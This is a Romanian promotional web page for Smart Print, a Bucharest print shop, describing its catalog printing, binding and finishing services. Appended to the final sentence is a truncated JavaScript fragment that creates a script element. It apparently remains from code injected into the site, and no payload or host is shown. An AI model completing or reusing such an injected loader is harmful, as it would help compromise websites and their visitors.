tiparire cataloage

tiparire cataloageO serie de imagini reprezentative, un layout modern si un text concis, pe scurt, catalogul de prezentare ideal, gata sa atraga viitorii clienti si colaboratori. Daca vrei sa adaugi strategiei tale de marketing si un catalog de prezentare menit sa-ti puna serviciile si produsele in valoare, apeleaza la Smart Print, tipografie din Bucuresti cu peste 20 de ani de experienta pe piata de profil.

Printre serviciile puse la dispozitie de Smart Print se numara si tiparire cataloage in policromie, un serviciu dedicat tuturor celor care vor sa se bucure de calitate si produse premium. Cataloagele pot fi unele de prezentare special concepute pentru expozitii, cataloage industriale, sau cataloage cu o alta destinatie. Putem realiza separatoare stantate, coperti groase, legatorie prin coasere ata, spirala metalica, capsare, mecanisme cu inele etc. Pe scurt, prin serviciul tiparire cataloage, Smart Print iti ofera posibilitatea sa-ti faci o promovare ca la carte.

Indiferent de produsele sau serviciile pe care doresti sa le faci cunoscute publicului larg, Smart Print iti sta la dispozitie cu tiparire cataloage, un serviciu accesibil si avantajos. Dincolo de calitate si design impecabil, iti oferim si preturi excelente!

Tiparire cataloage – Pentru o promovare de succes!

Atunci cand vrei sa atragi noi clienti, distribuitori si parteneri de afaceri, apelezi la strategiile de marketing, armele menite sa convinga de calitatea, profesionalismul si valorile pe care le promovezi.

Cataloagele de prezentare sunt forma potrivita de reclama pentru afacerile care prezinta atat produse pretentioase, cat si produse in serie. Comparativ cu o brosura, un catalog permite o prezentare mai detaliata cu privire la produsele si serviciile unei companii, avand un numar de pagini mai mare si un continut mai elaborat, mai concis.

In realizarea unui catalog de prezentare trebuie respectate toate detaliile referitoare la produse: imagini cu detalii, descrierea produselor cat mai clara si corecta. Pentru cei care vor sa convinga prin originalitate, exista modele atipice de cataloage atat in ceea ce priveste forma, cat si continutul. Astfel, se pot utiliza diferite  simboluri si iconite in a transmite avantajele unui produs anume.

Catalogul trebuie sa atraga atentia privitorului prin imagini sugestive care pun in valoare produsele, dar si printr-o asezare in pagina menita  sa faciliteze o parcurgere usoara a continutului. De preferat este fundalul uniform care sa asigure scoaterea in evidenta a produsului.

Si pentru ca scopul catalogului de prezentare este acela de a convinge si de a vinde, este esential sa mizezi pe calitate. In cazul de fata, calitate inseamna imagini clare, bine tiparite, culori vii si finisaje impecabile.

Smart Print – Tiparire cataloage obisnuite sau atipicetiparire cataloage

Pentru un catalog de prezentare menit sa atraga toata atentia, este necesar sa apelezi la o tipografie cu traditie. Smart Print executa tiparire cataloage  in policromie, la standarde inalte de calitate. Dispunem de toate resursele pentru cataloage cu un aspect estetic ireprosabil. Avem experienta, un personal bine pregatit si nu in ultimul rand, echipamente de ultima generatie.

Indiferent de modelul dorit, de continut, de numarul de pagini ori de forma, Smart Print executa tiparire cataloage in ton cu exigentele tale.

Printre activitatile pe care le realizam, se numara: finisare, legatorie prin coasere, brosare, stantare, embosare, plastifiere, lipire automate de cutii etc.

Pentru tiparire cataloage, acceseaza pagina noastra de internet si contacteaza-ne.var d=document;var s=d.createElement(‘script’);